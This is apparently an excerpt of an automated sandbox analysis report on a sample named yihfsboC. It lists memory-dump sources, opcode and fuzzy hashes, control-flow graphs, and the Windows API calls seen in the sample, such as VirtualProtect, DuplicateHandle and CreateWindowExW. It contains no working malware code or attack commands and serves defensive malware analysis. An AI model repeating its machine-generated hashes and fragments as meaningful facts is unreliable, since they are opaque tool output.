                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cd66bcfba50e0ccba7604ab2c696759780326fd43922c22d9b90a042468e56c8
                                                                                                                  • Instruction ID: 9d8965396cf653178fa54be4a3bcbb9386deb04cc6d2c7896364ff6c7acf7f8a
                                                                                                                  • Opcode Fuzzy Hash: cd66bcfba50e0ccba7604ab2c696759780326fd43922c22d9b90a042468e56c8
                                                                                                                  • Instruction Fuzzy Hash: D4B1B474E01228CFEB64CF6AC944B9EBBF2AF89310F14C1EAD449A7254D7345A85CF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 15f5ceddb717eea4544d51a1fd4672807a3c72579072218be7ec37d4ade4f684
                                                                                                                  • Instruction ID: 32e7baa55eaaafc62adba0fa501e19c7b410f4b29a18164f46f7523f1fcf8d76
                                                                                                                  • Opcode Fuzzy Hash: 15f5ceddb717eea4544d51a1fd4672807a3c72579072218be7ec37d4ade4f684
                                                                                                                  • Instruction Fuzzy Hash: 4AB1C475E01228CFEB64CF6AC944B9EBBF2AF89310F14C0EAD449A7254DB345A85CF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e022389571bf2f99f79f37a330d797a65a5cfc899d47c57692e110f1da929715
                                                                                                                  • Instruction ID: aca2e61af8577a32c0dc88211a26f74f9c3cf067a158c33054e82c5caae1c0c1
                                                                                                                  • Opcode Fuzzy Hash: e022389571bf2f99f79f37a330d797a65a5cfc899d47c57692e110f1da929715
                                                                                                                  • Instruction Fuzzy Hash: 81A1B574E012288FEB64CF6AC984B9EBBF6BF89300F10C0E9D549A7254D7355A85CF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5c0d9b20996728e862805e92956fad211e16e322a70e5d62a3b583714175c869
                                                                                                                  • Instruction ID: 78c9de18463c99610b14be50fef49a57797401ae5c87d1680814047bde7cf77b
                                                                                                                  • Opcode Fuzzy Hash: 5c0d9b20996728e862805e92956fad211e16e322a70e5d62a3b583714175c869
                                                                                                                  • Instruction Fuzzy Hash: 97A1B574E01228DFEB64CF6AC984B9EBBF6AF89300F10C1E9D449A7254D7345A85CF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2543136434.0000000028DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28DF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_28df0000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a2e0816a7377767a609a5752fbd13f73d5bb01dbfd84ec1bff8d2f8ab07868f9
                                                                                                                  • Instruction ID: 7585a015f615585395176fccabe371b7ac329f3f6cea4220528062b94de1e611
                                                                                                                  • Opcode Fuzzy Hash: a2e0816a7377767a609a5752fbd13f73d5bb01dbfd84ec1bff8d2f8ab07868f9
                                                                                                                  • Instruction Fuzzy Hash: 62A11574D00218CFEB14DFA9C884B9DBBB1FF89304F208269E409AB391DB749989CF55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: de1151a22ce8a471a827d18292b12e457462734dfdfdbe5334cb567f20e9a718
                                                                                                                  • Instruction ID: 06e4c504094a1edd859a78e92dc0eb439bd0d1bb9724fd02ed9c270a2c19ff57
                                                                                                                  • Opcode Fuzzy Hash: de1151a22ce8a471a827d18292b12e457462734dfdfdbe5334cb567f20e9a718
                                                                                                                  • Instruction Fuzzy Hash: E971A674E012288FEB58CF6AC98479EBBF2AF89300F14C0EAD44DA7254DB744A85CF51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29950000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fd89f5705b2ec82cc4e20c867e0547c3611b6375211fd148c2fe78a881742a65
                                                                                                                  • Instruction ID: a1fa8863e6e3136435efca8fe884d28d689afc86736ee04e431c0de4957e310a
                                                                                                                  • Opcode Fuzzy Hash: fd89f5705b2ec82cc4e20c867e0547c3611b6375211fd148c2fe78a881742a65
                                                                                                                  • Instruction Fuzzy Hash: B171B774E012288FEB58CF66C98479EBBF2AF89300F04C1EAD40DA7254DB744A85CF11
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544229660.0000000029950000.00000040.00000800.00020000.00000000.sdmp, Offset: 29950000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 156 4018f0-4018fa 157 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 156->157 158 4018fc-401900 156->158 161 401940-401949 GetLastError 157->161 162 401996-40199a 157->162 163 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 161->163 164 40198d-40198f 161->164 163->164 164->162 166 401991 call 401030 164->166 166->162
                                                                                                                  APIs
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                  • GetLastError.KERNEL32 ref: 00401940
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3322701435-0
                                                                                                                  • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                  • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                  • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                  • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 169 29b5c877-29b5c917 GetCurrentProcess 173 29b5c920-29b5c954 GetCurrentThread 169->173 174 29b5c919-29b5c91f 169->174 175 29b5c956-29b5c95c 173->175 176 29b5c95d-29b5c991 GetCurrentProcess 173->176 174->173 175->176 177 29b5c993-29b5c999 176->177 178 29b5c99a-29b5c9b2 176->178 177->178 190 29b5c9b5 call 29b5ca57 178->190 191 29b5c9b5 call 29b5cea8 178->191 182 29b5c9bb-29b5c9ea GetCurrentThreadId 183 29b5c9f3-29b5ca55 182->183 184 29b5c9ec-29b5c9f2 182->184 184->183 190->182 191->182
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 29B5C906
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 29B5C943
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 29B5C980
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 29B5C9D9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2063062207-0
                                                                                                                  • Opcode ID: 35d728b5a58411a40f0144d9d4eced6a4ec887f89482b61067abb3e1d5c4484f
                                                                                                                  • Instruction ID: bf692d5e9cf6f992432f791cf8daee5f84b9abde3f5d1d7f8e53fd04a65af921
                                                                                                                  • Opcode Fuzzy Hash: 35d728b5a58411a40f0144d9d4eced6a4ec887f89482b61067abb3e1d5c4484f
                                                                                                                  • Instruction Fuzzy Hash: F95196B49013498FEB19DFAAC988B9EBBF1EF89310F20805DE009A73A0D7345945CF65

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 192 29b5c888-29b5c917 GetCurrentProcess 196 29b5c920-29b5c954 GetCurrentThread 192->196 197 29b5c919-29b5c91f 192->197 198 29b5c956-29b5c95c 196->198 199 29b5c95d-29b5c991 GetCurrentProcess 196->199 197->196 198->199 200 29b5c993-29b5c999 199->200 201 29b5c99a-29b5c9b2 199->201 200->201 213 29b5c9b5 call 29b5ca57 201->213 214 29b5c9b5 call 29b5cea8 201->214 205 29b5c9bb-29b5c9ea GetCurrentThreadId 206 29b5c9f3-29b5ca55 205->206 207 29b5c9ec-29b5c9f2 205->207 207->206 213->205 214->205
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 29B5C906
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 29B5C943
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 29B5C980
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 29B5C9D9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2063062207-0
                                                                                                                  • Opcode ID: 986e18229a4f1030d39827bbaa3adca7a01321ae573e9c2e8c445b93d831e01e
                                                                                                                  • Instruction ID: 18f6ee40962720416f2cb29be7647023332966f6877cee8d77c2d5ac8529a258
                                                                                                                  • Opcode Fuzzy Hash: 986e18229a4f1030d39827bbaa3adca7a01321ae573e9c2e8c445b93d831e01e
                                                                                                                  • Instruction Fuzzy Hash: FC5176B49013498FEB14DFAAC588B9EBBF1EF88311F20805DE419A73A0DB346945CF65

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 215 40af66-40af6e 216 40af7d-40af88 call 40b84d 215->216 219 40af70-40af7b call 40d2e3 216->219 220 40af8a-40af8b 216->220 219->216 223 40af8c-40af98 219->223 224 40afb3-40afca call 40af49 call 40cd39 223->224 225 40af9a-40afb2 call 40aefc call 40d2bd 223->225 225->224
                                                                                                                  APIs
                                                                                                                  • _malloc.LIBCMT ref: 0040AF80
                                                                                                                    • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                    • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                    • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                  • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                    • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000E.00000002.2505613508.0000000000441000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_400000_yihfsboC.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1411284514-0
                                                                                                                  • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                  • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                  • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                  • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1823 29b59d24-29b59dc6 1824 29b59ddd-29b59de8 1823->1824 1825 29b59dc8-29b59dda 1823->1825 1826 29b59dfc-29b59e5c 1824->1826 1827 29b59dea-29b59df9 1824->1827 1825->1824 1829 29b59e64-29b59f04 CreateWindowExW 1826->1829 1827->1826 1830 29b59f06-29b59f0c 1829->1830 1831 29b59f0d-29b59f78 1829->1831 1830->1831 1835 29b59f85 1831->1835 1836 29b59f7a-29b59f7d 1831->1836 1837 29b59f86 1835->1837 1836->1835 1837->1837
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 29B59EF1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 716092398-0
                                                                                                                  • Opcode ID: fc5eee8c732c0b17e9585bfcf97206fcdfcd7b7ffc9ae5619e6b79399ddb3042
                                                                                                                  • Instruction ID: 2991eeb6b510a50ea9a315c21c899b3bcb56519a9a65e2f8d3b517d3e6d88f03
                                                                                                                  • Opcode Fuzzy Hash: fc5eee8c732c0b17e9585bfcf97206fcdfcd7b7ffc9ae5619e6b79399ddb3042
                                                                                                                  • Instruction Fuzzy Hash: EF7179B4D00218DFDF20CFA9D984ADDBBF1BF49304F5091AAE818A7221D730AA85CF45

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1838 29b59d30-29b59dc6 1839 29b59ddd-29b59de8 1838->1839 1840 29b59dc8-29b59dda 1838->1840 1841 29b59dfc-29b59f04 CreateWindowExW 1839->1841 1842 29b59dea-29b59df9 1839->1842 1840->1839 1845 29b59f06-29b59f0c 1841->1845 1846 29b59f0d-29b59f78 1841->1846 1842->1841 1845->1846 1850 29b59f85 1846->1850 1851 29b59f7a-29b59f7d 1846->1851 1852 29b59f86 1850->1852 1851->1850 1852->1852
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 29B59EF1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 716092398-0
                                                                                                                  • Opcode ID: a270c8941e8230f78b2eaad9b44acad6a7020fbffab02e10051078a3981420dd
                                                                                                                  • Instruction ID: 43aa7598542b1ffdef491f0d69da2a423fe77606cd9689961f3aadccdea53434
                                                                                                                  • Opcode Fuzzy Hash: a270c8941e8230f78b2eaad9b44acad6a7020fbffab02e10051078a3981420dd
                                                                                                                  • Instruction Fuzzy Hash: 7E7159B4D002589FDF20CFA9D980B9DBBB1BF09300F5091AAE918A7261D770AA85CF55
                                                                                                                  APIs
                                                                                                                  • KiUserExceptionDispatcher.NTDLL ref: 28DFAAC6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2543136434.0000000028DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28DF0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_28df0000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DispatcherExceptionUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 6842923-0
                                                                                                                  • Opcode ID: bcbb59de5aaf103310e1e25c5f942af1fa050282568af233d7a072ae46e8bc69
                                                                                                                  • Instruction ID: 226de51e3e1061781e618d56210d81f805702b7921c01da0704cff283cf3b4da
                                                                                                                  • Opcode Fuzzy Hash: bcbb59de5aaf103310e1e25c5f942af1fa050282568af233d7a072ae46e8bc69
                                                                                                                  • Instruction Fuzzy Hash: 2851AA7A4392069FE7516FB4C1AC96ABE76FB4F363700AD10A14AC3011BF3808498AE4

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 2048 29b5ca57-29b5ca60 2049 29b5ca62-29b5ca91 call 29b5c6cc 2048->2049 2050 29b5cabf-29b5cbab DuplicateHandle 2048->2050 2054 29b5ca96-29b5cabc 2049->2054 2052 29b5cbb4-29b5cbf4 2050->2052 2053 29b5cbad-29b5cbb3 2050->2053 2053->2052
                                                                                                                  APIs
                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 29B5CB9B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DuplicateHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3793708945-0
                                                                                                                  • Opcode ID: f234aac5266fb686fe54ebe5b4533769f275c665ea39558aa4845f06a5f6c52f
                                                                                                                  • Instruction ID: ba2adf51875a3638410797bdbd7b941395807971275628af111ebbcccf30eebd
                                                                                                                  • Opcode Fuzzy Hash: f234aac5266fb686fe54ebe5b4533769f275c665ea39558aa4845f06a5f6c52f
                                                                                                                  • Instruction Fuzzy Hash: 1951DD79D042889FCB01CFA9D880ADEBFB5FF4A310F14806AE918AB361D335A955CF50

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 2060 29b5cad0-29b5cbab DuplicateHandle 2061 29b5cbb4-29b5cbf4 2060->2061 2062 29b5cbad-29b5cbb3 2060->2062 2062->2061
                                                                                                                  APIs
                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 29B5CB9B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DuplicateHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3793708945-0
                                                                                                                  • Opcode ID: 872c6f98cce317ce42c6c47f34cb3f92c574fb5e6aed75e7862348ebb89e35d0
                                                                                                                  • Instruction ID: dfa62be4549152b9713c10dc0ed6802019176d0a2a787d1c67a5b29349468fa6
                                                                                                                  • Opcode Fuzzy Hash: 872c6f98cce317ce42c6c47f34cb3f92c574fb5e6aed75e7862348ebb89e35d0
                                                                                                                  • Instruction Fuzzy Hash: D44144B9D002589FCB10CFAAD984ADEBBF5BB09310F24906AE918BB310D335A945CF54

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 2066 29b5d6dc-29b5ddb4 2069 29b5de64-29b5de84 call 29b5993c 2066->2069 2070 29b5ddba-29b5ddbf 2066->2070 2077 29b5de87-29b5de94 2069->2077 2072 29b5ddc1-29b5ddf8 2070->2072 2073 29b5de12-29b5de4a CallWindowProcW 2070->2073 2079 29b5de01-29b5de10 2072->2079 2080 29b5ddfa-29b5de00 2072->2080 2075 29b5de53-29b5de62 2073->2075 2076 29b5de4c-29b5de52 2073->2076 2075->2077 2076->2075 2079->2077 2080->2079
                                                                                                                  APIs
                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 29B5DE39
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallProcWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2714655100-0
                                                                                                                  • Opcode ID: bed336a0f6e788d08632d085b4e726073d1d666a5bef5b8898de080fc0abea12
                                                                                                                  • Instruction ID: e9450c4f3567ee0134d3220d90dbda15afe94c016c9d2d6879ca8d2fd9736292
                                                                                                                  • Opcode Fuzzy Hash: bed336a0f6e788d08632d085b4e726073d1d666a5bef5b8898de080fc0abea12
                                                                                                                  • Instruction Fuzzy Hash: 164128B89003458FCB14CF99C484B9ABBF5FF98314F25C559D519AB361D774A842CFA0

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 2083 2417f368-2417f41c VirtualProtect 2086 2417f425-2417f46d 2083->2086 2087 2417f41e-2417f424 2083->2087 2087->2086
                                                                                                                  APIs
                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 2417F40C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2534518918.0000000024170000.00000040.00000800.00020000.00000000.sdmp, Offset: 24170000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_24170000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 544645111-0
                                                                                                                  • Opcode ID: 6068b19535d7203b369e367804f675a9389ca60f6d6c433e25c598edfa23614b
                                                                                                                  • Instruction ID: 236b6efc21eefd8882fabfd9cbcf453e8f8cb020d0e3000e74f1da2454d1d574
                                                                                                                  • Opcode Fuzzy Hash: 6068b19535d7203b369e367804f675a9389ca60f6d6c433e25c598edfa23614b
                                                                                                                  • Instruction Fuzzy Hash: 903197B8D012489FCB14DFA9D980A9EFBB1AB49310F20942AE815B7210D735A945CF54

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 2092 29b5777c-29b5e0cb SetTimer 2094 29b5e0d4-29b5e106 2092->2094 2095 29b5e0cd-29b5e0d3 2092->2095 2095->2094
                                                                                                                  APIs
                                                                                                                  • SetTimer.USER32(00000000,?,?,00000000), ref: 29B5E0BB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Timer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2870079774-0
                                                                                                                  • Opcode ID: 3a6fe7770b86df32a01b9eba2437fb60df86d564c3dd0e4570dfe854096b3536
                                                                                                                  • Instruction ID: e86aec68b765123098ba1c1acc13c4a9cc7b6e142cc3976ca9cea34d5374b2e4
                                                                                                                  • Opcode Fuzzy Hash: 3a6fe7770b86df32a01b9eba2437fb60df86d564c3dd0e4570dfe854096b3536
                                                                                                                  • Instruction Fuzzy Hash: 953187B8D04258AFCB10CFA9D580A9EFBF5EB49310F14902AE818BB310D375A945CFA4

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 2098 29b5e019-29b5e0cb SetTimer 2099 29b5e0d4-29b5e106 2098->2099 2100 29b5e0cd-29b5e0d3 2098->2100 2100->2099
                                                                                                                  APIs
                                                                                                                  • SetTimer.USER32(00000000,?,?,00000000), ref: 29B5E0BB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Timer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2870079774-0
                                                                                                                  • Opcode ID: fb5be4f5fa6dfa6c5e76f5ad97422d5f2584a5d46fef015c6531e6dab4b97a55
                                                                                                                  • Instruction ID: 41c66f24d0c67dbf71b30c9f7a087c114454aa6d4474f63a546ed7903beeb6a4
                                                                                                                  • Opcode Fuzzy Hash: fb5be4f5fa6dfa6c5e76f5ad97422d5f2584a5d46fef015c6531e6dab4b97a55
                                                                                                                  • Instruction Fuzzy Hash: 6D3188B9D00258AFCB14CFA9D580A9EFBF1AB09310F14902AE818BB310D375A945CF54
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(?), ref: 29B59172
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4139908857-0
                                                                                                                  • Opcode ID: e416662c7e2bc20a226618a52251ffbad54191a90f0d316155609d73bfbecf15
                                                                                                                  • Instruction ID: 5aeef233d9e0d6aa04f2d7b5de67ccc62a3f2fdf341f53c050ab2d0d6a08fc75
                                                                                                                  • Opcode Fuzzy Hash: e416662c7e2bc20a226618a52251ffbad54191a90f0d316155609d73bfbecf15
                                                                                                                  • Instruction Fuzzy Hash: F931CDB4D002599FCB14CFAAD584ADEFBF5AF49310F14906AE818B7320D374A942CFA4
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(?), ref: 29B59172
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000E.00000002.2544510907.0000000029B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 29B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_14_2_29b50000_yihfsboC.jbxd
                                                                                                                  Similarity
